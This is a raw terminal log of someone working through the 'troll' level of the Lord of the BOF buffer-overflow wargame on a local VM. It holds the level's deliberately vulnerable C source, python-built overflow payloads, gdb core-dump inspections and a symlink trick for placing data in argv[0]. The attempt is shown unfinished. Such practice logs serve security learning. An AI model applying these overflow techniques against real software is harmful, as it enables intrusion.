Xshell 5 (Build 1339)
Copyright (c) 2002-2017 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[c:\~]$ 

Connecting to 192.168.235.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
                                            _______________________
  _______________________-------------------                       `\
 /:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
 |        The Lord of the BOF : The Fellowship of the BOF, 2010    |
 |                                                                  |
 |                                                                  |
  |       [enter to the dungeon]                                    |
  |       gate : gate                                                |
  |                                                                  |
  |       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
  |                                              ____________________|_
  |  ___________________-------------------------                      `\
  |/`--_                                                                 |
  ||[ ]||                                            ___________________/
   \===/___________________-------------------------- 


login: ^]
Login incorrect

login: ^]
Login incorrect

login: d
Password: 
Login incorrect

login: d
Password: 

Login incorrect
Connection closing...Socket close.

Connection closed by foreign host.

Disconnected from remote host(LOB) at 19:10:44.

Type `help' to learn how to use Xshell prompt.
[c:\~]$ 

Connecting to 192.168.235.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
                                            _______________________
  _______________________-------------------                       `\
 /:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
 |        The Lord of the BOF : The Fellowship of the BOF, 2010    |
 |                                                                  |
 |                                                                  |
  |       [enter to the dungeon]                                    |
  |       gate : gate                                                |
  |                                                                  |
  |       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
  |                                              ____________________|_
  |  ___________________-------------------------                      `\
  |/`--_                                                                 |
  ||[ ]||                                            ___________________/
   \===/___________________-------------------------- 


login: orge
Password: 
[orge@localhost orge]$ ls
troll  troll.c
[orge@localhost orge]$ ls
troll  troll.c
[orge@localhost orge]$ ls
troll  troll.c
[orge@localhost orge]$ cat troll.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	// here is changed
	if(argc != 2){
		printf("argc must be two!\n");
		exit(0);
	}

	// egghunter 
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	// check the length of argument
	if(strlen(argv[1]) > 48){
		printf("argument is too long!\n");
		exit(0);
	}

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

	// one more!
	memset(argv[1], 0, strlen(argv[1]));
}
[orge@localhost orge]$ vi troll.c
[orge@localhost orge]$ ./troll a a 
argc must be two!
[orge@localhost orge]$ bash2
[orge@localhost orge]$ d
bash2: d: command not found
[orge@localhost orge]$ ./troll
argc must be two!
[orge@localhost orge]$ ./troll a
stack is still your friend.
[orge@localhost orge]$ ./troll a d
argc must be two!
[orge@localhost orge]$ vim
bash2: vim: command not found
[orge@localhost orge]$ cat ;
;
;

[orge@localhost orge]$ cp troll trell
[orge@localhost orge]$ ./trell
argc must be two!
[orge@localhost orge]$ ./trell asdf
stack is still your friend.
[orge@localhost orge]$ ./trell `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[orge@localhost orge]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./trell                                                 '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100s $esp
0xbffffb00:	 ""
0xbffffb01:	 ""
0xbffffb02:	 ""
0xbffffb03:	 ""
0xbffffb04:	 "Dÿ¿h8\001@\002"
0xbffffb12:	 ""
0xbffffb13:	 ""
0xbffffb14:	 "P\204\004\b"
0xbffffb19:	 ""
0xbffffb1a:	 ""
0xbffffb1b:	 ""
0xbffffb1c:	 "q\204\004\b"
0xbffffb21:	 "\205\004\b\002"
0xbffffb26:	 ""
0xbffffb27:	 ""
0xbffffb28:	 "D20\203\004\bl\206\004\b`®"
0xbffffb37:	 "@<20>\001@\002"
0xbffffb42:	 ""
0xbffffb43:	 ""
0xbffffb44:	 "5¿"
0xbffffb4d:	 ""
0xbffffb4e:	 ""
0xbffffb4f:	 ""
0xbffffb50:	 "n¿\226潿¿ؼÿ¿⽿¿¤þÿ¿ľÿ¿޾ÿ¿￿\016ÿÿ¿\031ÿÿ¿3ÿÿ¿@ÿÿ¿Hÿÿ¿Rÿÿ¿bÿÿ¿pÿÿ¿~ÿÿ¿\217ÿÿ¿\232ÿÿ¿ªÿÿ¿쀿¿"
0xbffffbad:	 ""
0xbffffbae:	 ""
0xbffffbaf:	 ""
0xbffffbb0:	 "\003"
0xbffffbb2:	 ""
0xbffffbb3:	 ""
0xbffffbb4:	 "4\200\004\b\004"
0xbffffbba:	 ""
0xbffffbbb:	 ""
0xbffffbbc:	 " "
0xbffffbbe:	 ""
0xbffffbbf:	 ""
0xbffffbc0:	 "\005"
0xbffffbc2:	 ""
0xbffffbc3:	 ""
0xbffffbc4:	 "\006"
0xbffffbc6:	 ""
0xbffffbc7:	 ""
0xbffffbc8:	 "\006"
0xbffffbca:	 ""
0xbffffbcb:	 ""
0xbffffbcc:	 ""
0xbffffbcd:	 "\020"
0xbffffbcf:	 ""
0xbffffbd0:	 "\a"
0xbffffbd2:	 ""
0xbffffbd3:	 ""
0xbffffbd4:	 ""
0xbffffbd5:	 ""
0xbffffbd6:	 ""
0xbffffbd7:	 "@\b"
---Type <return> to continue, or q <return> to quit---
0xbffffbda:	 ""
0xbffffbdb:	 ""
0xbffffbdc:	 ""
0xbffffbdd:	 ""
0xbffffbde:	 ""
0xbffffbdf:	 ""
0xbffffbe0:	 "\t"
0xbffffbe2:	 ""
0xbffffbe3:	 ""
0xbffffbe4:	 "P\204\004\b\013"
0xbffffbea:	 ""
0xbffffbeb:	 ""
0xbffffbec:	 ""
0xbffffbef:	 ""
0xbffffbf0:	 "\f"
0xbffffbf2:	 ""
0xbffffbf3:	 ""
0xbffffbf4:	 ""
0xbffffbf7:	 ""
0xbffffbf8:	 "\r"
0xbffffbfa:	 ""
0xbffffbfb:	 ""
0xbffffbfc:	 ""
0xbffffbff:	 ""
0xbffffc00:	 "\016"
0xbffffc02:	 ""
0xbffffc03:	 ""
0xbffffc04:	 ""
0xbffffc07:	 ""
0xbffffc08:	 "\020"
0xbffffc0a:	 ""
0xbffffc0b:	 ""
0xbffffc0c:	 "ÿꮱ7\017"
0xbffffc12:	 ""
0xbffffc13:	 ""
0xbffffc14:	 "0
0xbffffc19:	 ""
0xbffffc1a:	 ""
0xbffffc1b:	 ""
0xbffffc1c:	 ""
0xbffffc1d:	 ""
0xbffffc1e:	 ""
0xbffffc1f:	 ""
0xbffffc20:	 ""
0xbffffc21:	 ""
(gdb) x/100s $esp-500
0xbffff90c:	 ""
0xbffff90d:	 ""
0xbffff90e:	 ""
0xbffff90f:	 ""
0xbffff910:	 "ι\001@"
0xbffff915:	 ""
0xbffff916:	 ""
0xbffff917:	 ""
0xbffff918:	 ""
0xbffff919:	 ""
0xbffff91a:	 ""
0xbffff91b:	 ""
0xbffff91c:	 ""
0xbffff91d:	 ""
0xbffff91e:	 ""
0xbffff91f:	 ""
0xbffff920:	 ""
0xbffff921:	 ""
0xbffff922:	 ""
0xbffff923:	 ""
0xbffff924:	 ""
0xbffff925:	 ""
0xbffff926:	 ""
0xbffff927:	 ""
0xbffff928:	 "\b:\001@"
0xbffff92d:	 ":\001@ֹ\001@001@渜001@"
0xbffff93d:	 ""
0xbffff93e:	 ""
0xbffff93f:	 ""
0xbffff940:	 ""
0xbffff941:	 ""
0xbffff942:	 ""
0xbffff943:	 ""
0xbffff944:	 ""
0xbffff945:	 ""
0xbffff946:	 ""
0xbffff947:	 ""
0xbffff948:	 "蚰01@ꮰ1@"
0xbffff951:	 ""
0xbffff952:	 ""
0xbffff953:	 ""
0xbffff954:	 ""
0xbffff955:	 ""
0xbffff956:	 ""
0xbffff957:	 ""
0xbffff958:	 "ι\001@\016\233\002@0ड़201"
0xbffff967:	 "@Ԝ232\002@Ԝ232\002@h8\001@001@\210C"
0xbffff97b:	 ""
0xbffff97c:	 "h8\001@\016\233\002@Tड़201"
0xbffff98b:	 "@Ԝ232\002@Ԝ232\002@h8\001@001@\\x"
0xbffff99f:	 ""
0xbffff9a0:	 "嚲01"
0xbffff9a3:	 "@Ԝ232\002@ல\004\bh8\001@ξ\001@!"
0xbffff9b6:	 ""
0xbffff9b7:	 ""
---Type <return> to continue, or q <return> to quit---
0xbffff9b8:	 "u"
0xbffff9ba:	 ""
0xbffff9bb:	 ""
0xbffff9bc:	 "p­\001@\200p"
0xbffff9c3:	 ""
0xbffff9c4:	 "\016\233\002@\230
0xbffff9cd:	 ""
0xbffff9ce:	 ""
0xbffff9cf:	 ""
0xbffff9d0:	 "Ԝ232\002@ꮳ5\002@\b\a"
0xbffff9db:	 ""
0xbffff9dc:	 "Ϝ037\002@p­\001@001@\003"
0xbffff9ea:	 ""
0xbffff9eb:	 ""
0xbffff9ec:	 "PF\001@\001"
0xbffff9f2:	 ""
0xbffff9f3:	 ""
0xbffff9f4:	 "\f௜035\002@ㄜ001@f\002y\r\210󇀲30\002@ꮳ5\002@001@Ӏ\001@¦\005y\a 202\004\b0¶\001@001@001@PF\001@\001"
0xbffffa36:	 ""
0xbffffa37:	 ""
0xbffffa38:	 "P04\201\004\bӀ\001@\017S\216\aͺÿ¿Ϝ202\004\b \034\002@\214ཧ"
0xbffffa5b:	 "@σ\001@°F\001@\a"
0xbffffa66:	 ""
0xbffffa67:	 ""
0xbffffa68:	 "N§"
0xbffffa6b:	 "@뚲01\020@`®"
0xbffffa73:	 "@D߃\001@ꮳ5\002@ￜ210\020@,\230\002@ꮳ5\002@¼"
0xbffffa93:	 "@n갲2þÿÿ ؜005@001@¼\006@\200i\020@`®"
0xbffffab3:	 "@D๺ÿ¿:\206\004\b=
0xbffffac5:	 ""
0xbffffac6:	 ""
0xbffffac7:	 ""
0xbffffac8:	 "0"
0xbffffaca:	 ""
0xbffffacb:	 ""
0xbffffacc:	 "\027"
0xbfffface:	 ""
0xbffffacf:	 ""
0xbffffad0:	 ""
0xbffffad1:	 ""
0xbffffad2:	 ""
0xbffffad3:	 ""
0xbffffad4:	 ""
0xbffffad5:	 ""
0xbffffad6:	 ""
(gdb) 
(gdb) x/100x $esp-100
0xbffffa9c:	0x4005d920	0x400143e0	0xbffffabc	0x40066070
0xbffffaac:	0x40106980	0x4000ae60	0xbffffb44	0xbffffaf8
0xbffffabc:	0x0804863a	0xbffffc3d	0x00000000	0x00000030
0xbffffacc:	0x00000017	0x00000000	0x00000000	0x00000000
0xbffffadc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffaec:	0x00000000	0x00000000	0x00000000	0x41414141
0xbffffafc:	0xbfbfbfbf	0x00000000	0xbffffb44	0xbffffb50
0xbffffb0c:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffffb1c:	0x08048471	0x08048500	0x00000002	0xbffffb44
0xbffffb2c:	0x08048390	0x0804866c	0x4000ae60	0xbffffb3c
0xbffffb3c:	0x40013e90	0x00000002	0xbffffc35	0xbffffc3d
0xbffffb4c:	0x00000000	0xbffffc6e	0xbffffc7d	0xbffffc96
0xbffffb5c:	0xbffffcb5	0xbffffcd7	0xbffffce1	0xbffffea4
0xbffffb6c:	0xbffffec3	0xbffffedd	0xbffffef2	0xbfffff0e
0xbffffb7c:	0xbfffff19	0xbfffff33	0xbfffff40	0xbfffff48
0xbffffb8c:	0xbfffff52	0xbfffff62	0xbfffff70	0xbfffff7e
0xbffffb9c:	0xbfffff8f	0xbfffff9a	0xbfffffaa	0xbfffffea
0xbffffbac:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffbbc:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffbcc:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffbdc:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffbec:	0x000001fb	0x0000000c	0x000001fb	0x0000000d
0xbffffbfc:	0x000001fb	0x0000000e	0x000001fb	0x00000010
0xbffffc0c:	0x0fabfbff	0x0000000f	0xbffffc30	0x00000000
0xbffffc1c:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbffffc2c:	0x00000000	0x36383669	0x742f2e00	0x6c6c6572
0xbffffc3c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc4c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc5c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc6c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc7c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc8c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc9c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcac:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffccc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcdc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcec:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcfc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd2c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd3c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd4c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd5c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd6c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd7c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd8c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd9c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdac:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbffffdbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdcc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffddc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdec:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdfc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe2c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe3c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe4c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe5c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe6c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe7c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe8c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe9c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffeac:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffebc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffecc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffedc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffeec:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffefc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff0c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff2c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff3c:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbfffff4c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff5c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff6c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff7c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff8c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff9c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffac:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffbc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffcc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffdc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffec:	0x00000000	0x00000000	0x72742f2e	0x006c6c65
0xbffffffc:	0x00000000	Cannot access memory at address 0xc0000000
(gdb) x/100x $esp-100
0xbffffa9c:	0x4005d920	0x400143e0	0xbffffabc	0x40066070
0xbffffaac:	0x40106980	0x4000ae60	0xbffffb44	0xbffffaf8
0xbffffabc:	0x0804863a	0xbffffc3d	0x00000000	0x00000030
0xbffffacc:	0x00000017	0x00000000	0x00000000	0x00000000
0xbffffadc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffaec:	0x00000000	0x00000000	0x00000000	0x41414141
0xbffffafc:	0xbfbfbfbf	0x00000000	0xbffffb44	0xbffffb50
0xbffffb0c:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffffb1c:	0x08048471	0x08048500	0x00000002	0xbffffb44
0xbffffb2c:	0x08048390	0x0804866c	0x4000ae60	0xbffffb3c
0xbffffb3c:	0x40013e90	0x00000002	0xbffffc35	0xbffffc3d
0xbffffb4c:	0x00000000	0xbffffc6e	0xbffffc7d	0xbffffc96
0xbffffb5c:	0xbffffcb5	0xbffffcd7	0xbffffce1	0xbffffea4
0xbffffb6c:	0xbffffec3	0xbffffedd	0xbffffef2	0xbfffff0e
0xbffffb7c:	0xbfffff19	0xbfffff33	0xbfffff40	0xbfffff48
0xbffffb8c:	0xbfffff52	0xbfffff62	0xbfffff70	0xbfffff7e
0xbffffb9c:	0xbfffff8f	0xbfffff9a	0xbfffffaa	0xbfffffea
0xbffffbac:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffbbc:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffbcc:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffbdc:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffbec:	0x000001fb	0x0000000c	0x000001fb	0x0000000d
0xbffffbfc:	0x000001fb	0x0000000e	0x000001fb	0x00000010
0xbffffc0c:	0x0fabfbff	0x0000000f	0xbffffc30	0x00000000
0xbffffc1c:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/100x $esp-50 
0xbfffface:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffade:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffaee:	0x00000000	0x00000000	0x41410000	0xbfbf4141
0xbffffafe:	0x0000bfbf	0xfb440000	0xfb50bfff	0x3868bfff
0xbffffb0e:	0x00024001	0x84500000	0x00000804	0x84710000
0xbffffb1e:	0x85000804	0x00020804	0xfb440000	0x8390bfff
0xbffffb2e:	0x866c0804	0xae600804	0xfb3c4000	0x3e90bfff
0xbffffb3e:	0x00024001	0xfc350000	0xfc3dbfff	0x0000bfff
0xbffffb4e:	0xfc6e0000	0xfc7dbfff	0xfc96bfff	0xfcb5bfff
0xbffffb5e:	0xfcd7bfff	0xfce1bfff	0xfea4bfff	0xfec3bfff
0xbffffb6e:	0xfeddbfff	0xfef2bfff	0xff0ebfff	0xff19bfff
0xbffffb7e:	0xff33bfff	0xff40bfff	0xff48bfff	0xff52bfff
0xbffffb8e:	0xff62bfff	0xff70bfff	0xff7ebfff	0xff8fbfff
0xbffffb9e:	0xff9abfff	0xffaabfff	0xffeabfff	0x0000bfff
0xbffffbae:	0x00030000	0x80340000	0x00040804	0x00200000
0xbffffbbe:	0x00050000	0x00060000	0x00060000	0x10000000
0xbffffbce:	0x00070000	0x00000000	0x00084000	0x00000000
0xbffffbde:	0x00090000	0x84500000	0x000b0804	0x01fb0000
0xbffffbee:	0x000c0000	0x01fb0000	0x000d0000	0x01fb0000
0xbffffbfe:	0x000e0000	0x01fb0000	0x00100000	0xfbff0000
0xbffffc0e:	0x000f0fab	0xfc300000	0x0000bfff	0x00000000
0xbffffc1e:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc2e:	0x36690000	0x2e003638	0x6572742f	0x00006c6c
0xbffffc3e:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc4e:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) q
[orge@localhost orge]$ ./trell `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[orge@localhost orge]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./trell                                                 '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100 $esp-100
0xbffffa9c:	0x4005d920	0x400143e0	0xbffffabc	0x40066070
0xbffffaac:	0x40106980	0x4000ae60	0xbffffb44	0xbffffaf8
0xbffffabc:	0x0804863a	0xbffffc3d	0x00000000	0x00000030
0xbffffacc:	0x00000017	0x00000000	0x00000000	0x00000000
0xbffffadc:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffaec:	0x00000000	0x00000000	0x00000000	0x41414141
0xbffffafc:	0xbfbfbfbf	0x00000000	0xbffffb44	0xbffffb50
0xbffffb0c:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffffb1c:	0x08048471	0x08048500	0x00000002	0xbffffb44
0xbffffb2c:	0x08048390	0x0804866c	0x4000ae60	0xbffffb3c
0xbffffb3c:	0x40013e90	0x00000002	0xbffffc35	0xbffffc3d
0xbffffb4c:	0x00000000	0xbffffc6e	0xbffffc7d	0xbffffc96
0xbffffb5c:	0xbffffcb5	0xbffffcd7	0xbffffce1	0xbffffea4
0xbffffb6c:	0xbffffec3	0xbffffedd	0xbffffef2	0xbfffff0e
0xbffffb7c:	0xbfffff19	0xbfffff33	0xbfffff40	0xbfffff48
0xbffffb8c:	0xbfffff52	0xbfffff62	0xbfffff70	0xbfffff7e
0xbffffb9c:	0xbfffff8f	0xbfffff9a	0xbfffffaa	0xbfffffea
0xbffffbac:	0x00000000	0x00000003	0x08048034	0x00000004
0xbffffbbc:	0x00000020	0x00000005	0x00000006	0x00000006
0xbffffbcc:	0x00001000	0x00000007	0x40000000	0x00000008
0xbffffbdc:	0x00000000	0x00000009	0x08048450	0x0000000b
0xbffffbec:	0x000001fb	0x0000000c	0x000001fb	0x0000000d
0xbffffbfc:	0x000001fb	0x0000000e	0x000001fb	0x00000010
0xbffffc0c:	0x0fabfbff	0x0000000f	0xbffffc30	0x00000000
0xbffffc1c:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) q
[orge@localhost orge]$ ln -s troll `python -c 'print "A"*30'`
[orge@localhost orge]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault
[orge@localhost orge]$ rm AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
[orge@localhost orge]$ ln -s trell `python -c 'print "A"*30'`
[orge@localhost orge]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[orge@localhost orge]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA                                              '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/100 $esp
0xbffffab0:	0x00000000	0xbffffaf4	0xbffffb00	0x40013868
0xbffffac0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffad0:	0x08048500	0x00000002	0xbffffaf4	0x08048390
0xbffffae0:	0x0804866c	0x4000ae60	0xbffffaec	0x40013e90
0xbffffaf0:	0x00000002	0xbffffbea	0xbffffc0b	0x00000000
0xbffffb00:	0xbffffc3c	0xbffffc4b	0xbffffc64	0xbffffc83
0xbffffb10:	0xbffffca5	0xbffffcaf	0xbffffe72	0xbffffe91
0xbffffb20:	0xbffffeab	0xbffffec0	0xbffffedc	0xbffffee7
0xbffffb30:	0xbfffff01	0xbfffff0e	0xbfffff16	0xbfffff20
0xbffffb40:	0xbfffff30	0xbfffff3e	0xbfffff4c	0xbfffff5d
0xbffffb50:	0xbfffff68	0xbfffff78	0xbfffffb8	0x00000000
0xbffffb60:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffb70:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffb80:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffb90:	0x00000009	0x08048450	0x0000000b	0x000001fb
0xbffffba0:	0x0000000c	0x000001fb	0x0000000d	0x000001fb
0xbffffbb0:	0x0000000e	0x000001fb	0x00000010	0x0fabfbff
0xbffffbc0:	0x0000000f	0xbffffbe5	0x00000000	0x00000000
0xbffffbd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbe0:	0x00000000	0x38366900	0x2f2e0036	0x41414141
0xbffffbf0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc00:	0x41414141	0x41414141	0x00004141	0x00000000
0xbffffc10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc30:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbffffc40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffda0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdc0:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) 
0xbffffdd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffde0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdf0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffea0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffeb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffec0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffed0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffee0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffef0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff20:	0x00000000	0x00000000	0x00000000	0x00000000
